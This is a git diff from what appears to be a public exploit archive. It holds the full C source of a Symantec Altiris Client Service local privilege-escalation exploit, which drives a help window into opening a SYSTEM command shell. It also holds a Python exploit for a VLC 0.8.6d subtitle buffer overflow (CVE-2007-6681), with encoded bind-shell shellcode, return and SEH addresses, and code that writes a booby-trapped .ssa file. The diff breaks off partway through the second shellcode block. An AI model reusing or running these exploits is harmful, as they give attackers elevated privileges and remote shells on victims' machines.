- strcpy(langO[0x0c],"Ouvrir");
- strcpy(langO[0x09],"Open");
- strcpy(langO[0x0a],"Abrir");
-
- printf("##########################################################\n");
- printf("# Altiris Client Service #\n");
- printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit #\n");
- printf("# by sirdarckcat & alt3kx #\n");
- printf("# #\n");
- printf("# This exploit is based on www.milw0rm.com/exploits/350 #\n");
- printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
- printf("# by Cesar Cerrudo #\n");
- printf("##########################################################\n\n");
-
- id=PRIMARYLANGID(GetSystemDefaultLangID());
- if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
- printf("Lang not found, using english\n");
- id=9;
- }
-
- char sText[]="%windir%\\system32\\cmd.ex?";
-
- if (argc<2){
- printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);
- printf("Look for your LANG-ID here:\n");
- printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");
- printf("\nAnyway, the program will try to guess it.\n\n");
- return 0;
- }else{
- if (argc==2){
- if (langH[atoi(argv[1])]){
- id=atoi(argv[1]);
- printf("Lang changed\n");
- }else{
- printf("Lang not supported\n",id);
- }
- }
- }
- printf("Using 
Lang %d\n",id);
- printf("Looking for %s..\n",wname);
- lHandle=FindWindow(NULL, wname);
- if (!lHandle) {
- printf("Window %s not found\n", wname);
- return 0;
- }else{
- printf("Found! exploiting..\n");
- }
- PostMessage(lHandle,0x313,NULL,NULL);
-
- Sleep(100);
-
- SendMessage(lHandle,0x365,NULL,0x1);
- Sleep(300);
- pp:
- if (!FindWindow(NULL, langH[id])){
- printf("Help Window not found.. exploit unsuccesful\n");
- if (id!=9){
- printf("Trying with english..\n");
- id=9;
- goto pp;
- }else{
- return 0;
- }
- }else{
- printf("Help Window found! exploiting..\n");
- }
- SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
- Sleep(500);
- lHandle = FindWindow("#32770",langO[id]);
- lHandle2 = GetDlgItem(lHandle, 0x47C);
- Sleep(500);
- printf("Sending path..\n");
- SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
- Sleep(800);
- SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
- lHandle2 = GetDlgItem(lHandle, 0x4A0);
- printf("Looking for cmd..\n");
- SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
- Sleep(500);
- lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
- lHandle2 = GetDlgItem(lHandle2, 0x1);
- printf("Sending keys..\n");
- SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
- SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
- SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
- Sleep(500);
- mark:
- PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
- Sleep(1000);
- point.x =10; point.y =30;
- lHandle2=WindowFromPoint(point);
- Sleep(1000);
- printf("Opening shell..\n");
- SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
- Sleep(1000);
- SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
- Sleep(1000);
- SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
- Sleep(1000);
- if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){
- printf("Failed\n");
- if (!a){
- a++;
- goto mark;
- }
- }else{
- printf("Done!\n");
- }
- if(!a){
- SendMessage (lHandle, WM_CLOSE,0,0);
- 
Sleep(500);
- SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
- SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
- }else{
- printf("The exploit failed, but maybe the context window of the shell is visibile.\n");
- }
- return 0;
-}
-
-// milw0rm.com [2008-05-15]
+// 0day PRIVATE NOT DISTRIBUTE!!!
+//
+// Symantec Altiris Client Service Local Exploit (0day)
+//
+// Affected Versions : Altiris Client 6.5.248
+ Altiris Client 6.5.299
+ Altiris client 6.8.378
+//
+// Alex Hernandez aka alt3kx
+// ahernandez [at] sybsecurity.com
+//
+// Eduardo Vela aka sirdarckcat
+// sirdarckcat [at] gmail.com
+//
+// We'll see you soon at ph-neutral 0x7d8
+
+#include "stdio.h"
+#include "windows.h"
+
+int main(int argc, char* argv[])
+{
+ HWND lHandle, lHandle2;
+ POINT point;
+ int id,a=0;
+ char langH[255][255];
+ char langO[255][255];
+ char wname[]="Altiris Client Service";
+
+ strcpy(langH[0x0c],"Aide de Windows");
+ strcpy(langH[0x09],"Windows Help");
+ strcpy(langH[0x0a],"Ayuda de Windows");
+
+ strcpy(langO[0x0c],"Ouvrir");
+ strcpy(langO[0x09],"Open");
+ strcpy(langO[0x0a],"Abrir");
+
+ printf("##########################################################\n");
+ printf("# Altiris Client Service #\n");
+ printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit #\n");
+ printf("# by sirdarckcat & alt3kx #\n");
+ printf("# #\n");
+ printf("# This exploit is based on www.milw0rm.com/exploits/350 #\n");
+ printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
+ printf("# by Cesar Cerrudo #\n");
+ printf("##########################################################\n\n");
+
+ id=PRIMARYLANGID(GetSystemDefaultLangID());
+ if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
+ printf("Lang not found, using english\n");
+ id=9;
+ }
+
+ char sText[]="%windir%\\system32\\cmd.ex?";
+
+ if (argc<2){
+ printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);
+ printf("Look for your LANG-ID here:\n");
+ 
printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");
+ printf("\nAnyway, the program will try to guess it.\n\n");
+ return 0;
+ }else{
+ if (argc==2){
+ if (langH[atoi(argv[1])]){
+ id=atoi(argv[1]);
+ printf("Lang changed\n");
+ }else{
+ printf("Lang not supported\n",id);
+ }
+ }
+ }
+ printf("Using Lang %d\n",id);
+ printf("Looking for %s..\n",wname);
+ lHandle=FindWindow(NULL, wname);
+ if (!lHandle) {
+ printf("Window %s not found\n", wname);
+ return 0;
+ }else{
+ printf("Found! exploiting..\n");
+ }
+ PostMessage(lHandle,0x313,NULL,NULL);
+
+ Sleep(100);
+
+ SendMessage(lHandle,0x365,NULL,0x1);
+ Sleep(300);
+ pp:
+ if (!FindWindow(NULL, langH[id])){
+ printf("Help Window not found.. exploit unsuccesful\n");
+ if (id!=9){
+ printf("Trying with english..\n");
+ id=9;
+ goto pp;
+ }else{
+ return 0;
+ }
+ }else{
+ printf("Help Window found! exploiting..\n");
+ }
+ SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
+ Sleep(500);
+ lHandle = FindWindow("#32770",langO[id]);
+ lHandle2 = GetDlgItem(lHandle, 0x47C);
+ Sleep(500);
+ printf("Sending path..\n");
+ SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
+ Sleep(800);
+ SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
+ lHandle2 = GetDlgItem(lHandle, 0x4A0);
+ printf("Looking for cmd..\n");
+ SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
+ Sleep(500);
+ lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
+ lHandle2 = GetDlgItem(lHandle2, 0x1);
+ printf("Sending keys..\n");
+ SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
+ SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
+ SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
+ Sleep(500);
+ mark:
+ PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
+ Sleep(1000);
+ point.x =10; point.y =30;
+ lHandle2=WindowFromPoint(point);
+ Sleep(1000);
+ printf("Opening shell..\n");
+ SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
+ Sleep(1000);
+ SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
+ Sleep(1000);
+ 
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
+ Sleep(1000);
+ if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){
+ printf("Failed\n");
+ if (!a){
+ a++;
+ goto mark;
+ }
+ }else{
+ printf("Done!\n");
+ }
+ if(!a){
+ SendMessage (lHandle, WM_CLOSE,0,0);
+ Sleep(500);
+ SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
+ SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
+ }else{
+ printf("The exploit failed, but maybe the context window of the shell is visibile.\n");
+ }
+ return 0;
+}
+
+// milw0rm.com [2008-05-15]
diff --git a/platforms/windows/local/5667.py b/platforms/windows/local/5667.py
index e82856fb7..4b8344323 100755
--- a/platforms/windows/local/5667.py
+++ b/platforms/windows/local/5667.py
@@ -1,161 +1,161 @@ -#!/usr/bin/python -# -# VLC 0.8.6d Double Sh311 Universal Exploit -# CVE-2007-6681 -# Vulnerability Discovered by Michal Luczaj -# -# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/ -# and -# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net -# WE CODED IT JUST FOR FUN ;) -# Cheers to #offsec and all our firends :) and prelate_ hehe -#----------------------------------------------------------------------------- -# -# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP -# -# matte@badrobot:~$ telnet 192.168.1.245 4444 -# Trying 192.168.1.245... -# Connected to 192.168.1.245. -# Escape character is '^]'. -# Microsoft Windows XP [Version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. -# -# C:\Program Files\VideoLAN\VLC>exit -# exit -# -# AT "EXIT" SEH is CALLED and WE OWN EIP AGAIN :P -# SECOND SHELL -> SEH OVERFLOW -# -# Connection closed by foreign host. -# matte@badrobot:~$ telnet 192.168.1.245 4444 -# Trying 192.168.1.245... -# Connected to 192.168.1.245. -# Escape character is '^]'. -# Microsoft Windows XP [Version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. 
-#
-# C:\Program Files\VideoLAN\VLC>exit
-# exit
-#
-# AT "EXIT" SEH is CALLED and WE OWN EIP AGAIN :P
-# SECOND SHELL -> SEH OVERFLOW
-#
-# Connection closed by foreign host.
-# matte@badrobot:~$ telnet 192.168.1.245 4444
-# Trying 192.168.1.245...
-# Connected to 192.168.1.245.
-# Escape character is '^]'.
-# Microsoft Windows XP [Version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
-#
-# C:\Program Files\VideoLAN\VLC>
-#-----------------------------------------------------------------------------
-
-# win32_bind - EXITFUNC=seh LPORT=4444
-# Size=709 Encoder=PexAlphaNum http://metasploit.com
-SHELLCODE1 = (
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
-"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
-"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37"
-"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38"
-"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48"
-"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48"
-"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
-"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48"
-"\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d"
-"\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38"
-"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36"
-"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
-"\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57"
-"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
-"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
-"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50"
-"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
-"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
-"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51"
-"\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a"
-"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31"
-"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52"
-"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
-"\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d"
-"\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
-"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45"
-"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36"
-"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c"
-"\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c"
-"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42"
-"\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
-"\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f"
-"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46"
-"\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46"
-"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
-"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
-"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
-"\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
-"\x4f\x4f\x42\x4d\x5a"
-)
-
-# win32_bind - EXITFUNC=thread LPORT=4444
-# [*] x86/alpha_mixed succeeded, final size 698
-SHELLCODE2 = (
-"\x89\xe7\xd9\xcb\xd9\x77\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
-"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
-"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
-"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4a\x48\x4a\x59\x4b\x4f\x4b"
-"\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x46\x44\x51\x34\x4c\x4b"
-"\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x43\x31\x4a"
-"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31"
-"\x4a\x4b\x50\x49\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x50"
-"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43\x37"
-"\x49\x51\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47"
-"\x4b\x51\x44\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
-"\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c"
-"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
-"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x48\x43\x50\x31\x49"
-"\x4b\x45\x34\x4c\x4b\x50\x43\x50\x30\x4c\x4b\x47\x30\x44\x4c"
-"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
-"\x4e\x43\x58\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
-"\x4e\x36\x45\x36\x50\x53\x45\x36\x42\x48\x46\x53\x50\x32\x42"
-"\x48\x42\x57\x42\x53\x46\x52\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
-"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
-"\x36\x51\x4f\x4b\x39\x4b\x55\x42\x46\x4b\x31\x4a\x4d\x43\x38"
-"\x45\x52\x46\x35\x43\x5a\x43\x32\x4b\x4f\x4e\x30\x45\x38\x4e"
-"\x39\x44\x49\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x50\x53"
-"\x51\x43\x46\x33\x46\x33\x51\x43\x47\x33\x51\x43\x47\x33\x51"
-"\x43\x4b\x4f\x4e\x30\x43\x56\x43\x58\x44\x51\x51\x4c\x45\x36"
-"\x46\x33\x4d\x59\x4b\x51\x4a\x35\x42\x48\x4e\x44\x45\x4a\x42"
-"\x50\x49\x57\x46\x37\x4b\x4f\x4e\x36\x43\x5a\x44\x50\x50\x51"
-"\x50\x55\x4b\x4f\x48\x50\x42\x48\x49\x34\x4e\x4d\x46\x4e\x4b"
-"\x59\x46\x37\x4b\x4f\x48\x56\x51\x43\x46\x35\x4b\x4f\x48\x50"
-"\x45\x38\x4b\x55\x51\x59\x4d\x56\x47\x39\x51\x47\x4b\x4f\x48"
-"\x56\x46\x30\x46\x34\x46\x34\x51\x45\x4b\x4f\x4e\x30\x4a\x33"
-"\x45\x38\x4d\x37\x43\x49\x48\x46\x43\x49\x51\x47\x4b\x4f\x4e"
-"\x36\x51\x45\x4b\x4f\x48\x50\x43\x56\x43\x5a\x43\x54\x43\x56"
-"\x43\x58\x42\x43\x42\x4d\x4b\x39\x4b\x55\x42\x4a\x50\x50\x46"
-"\x39\x46\x49\x48\x4c\x4b\x39\x4d\x37\x42\x4a\x47\x34\x4d\x59"
-"\x4b\x52\x50\x31\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
-"\x4d\x4b\x4e\x47\x32\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
-"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x43\x42\x4b\x4e\x4e\x53\x44"
-"\x56\x4b\x4f\x44\x35\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
-"\x46\x32\x50\x51\x46\x31\x50\x51\x43\x5a\x45\x51\x46\x31\x46"
-"\x31\x46\x35\x46\x31\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x48\x59"
-"\x44\x45\x48\x4e\x51\x43\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
-"\x4f\x50\x37\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
-"\x48\x44\x42\x44\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x42"
-"\x48\x4a\x4f\x48\x4e\x4d\x30\x45\x30\x46\x33\x4b\x4f\x49\x46"
-"\x4b\x4f\x4e\x30\x44\x4a\x41\x41" )
-
-OFFSET1 = 'A'*152242
-NOP1 = '\x90'*16
-OFFSET2 = 'B'*10901
-JMPESP = '\x59\x65\xFE\x62' # 0x62FE6559 jmp ESP libvlc.dll
-OFFSET3 = 'C'*674
-SEH = '\x66\x14\x40' # POP POP RET in vlc.exe
-JMPBACK = '\xE9\x2E\xCD\xFF\xFF' # ^E9 2ECDFFFF JMP 0250CCD2
-JMPS = '\xEB\xF9\x90\x90'
-EVIL = OFFSET1 + NOP1 + SHELLCODE1 + OFFSET2 + JMPESP + SHELLCODE1 + OFFSET3 + JMPBACK + JMPS + SEH
-
-fileHandle = open('film1.ssa', 'w' )
-fileHandle.write('[Script Info]\n')
-fileHandle.write('ScriptType: v4.00\n')
-fileHandle.write('Title: VLC 0.8.6d buffer-overflow\n')
-fileHandle.write('Collisions: Normal\n\n')
-fileHandle.write('[V4 Styles]\n\n')
-fileHandle.write('[Events]\n')
-fileHandle.write('Dialogue: '+ EVIL)
-fileHandle.close()
-
-# milw0rm.com [2008-05-23]
+#!/usr/bin/python
+#
+# VLC 0.8.6d Double Sh311 Universal Exploit
+# CVE-2007-6681
+# Vulnerability Discovered by Michal Luczaj
+#
+# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
+# and
+# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
+# WE CODED IT JUST FOR FUN ;)
+# Cheers to #offsec and all our firends :) and prelate_ hehe
+#-----------------------------------------------------------------------------
+#
+# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
+#
+# matte@badrobot:~$ telnet 192.168.1.245 4444
+# Trying 192.168.1.245...
+# Connected to 192.168.1.245.
+# Escape character is '^]'.
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+#
+# C:\Program Files\VideoLAN\VLC>exit
+# exit
+#
+# AT "EXIT" SEH is CALLED and WE OWN EIP AGAIN :P
+# SECOND SHELL -> SEH OVERFLOW
+#
+# Connection closed by foreign host.
+# matte@badrobot:~$ telnet 192.168.1.245 4444
+# Trying 192.168.1.245...
+# Connected to 192.168.1.245.
+# Escape character is '^]'.
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+#
+# C:\Program Files\VideoLAN\VLC>
+#-----------------------------------------------------------------------------
+
+# win32_bind - EXITFUNC=seh LPORT=4444
+# Size=709 Encoder=PexAlphaNum http://metasploit.com
+SHELLCODE1 = (
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
+"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37"
+"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38"
+"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48"
+"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48"
+"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
+"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48"
+"\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d"
+"\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38"
+"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36"
+"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
+"\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57"
+"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
+"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
+"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50"
+"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
+"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
+"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51"
+"\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a"
+"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31"
+"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52"
+"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
+"\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d"
+"\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
+"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45"
+"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36"
+"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c"
+"\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c"
+"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42"
+"\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
+"\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f"
+"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46"
+"\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46"
+"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
+"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
+"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
+"\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
+"\x4f\x4f\x42\x4d\x5a"
+)
+
+# win32_bind - EXITFUNC=thread LPORT=4444
+# [*] x86/alpha_mixed succeeded, final size 698
+SHELLCODE2 = (
+"\x89\xe7\xd9\xcb\xd9\x77\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4a\x48\x4a\x59\x4b\x4f\x4b"
+"\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x46\x44\x51\x34\x4c\x4b"
+"\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x43\x31\x4a"
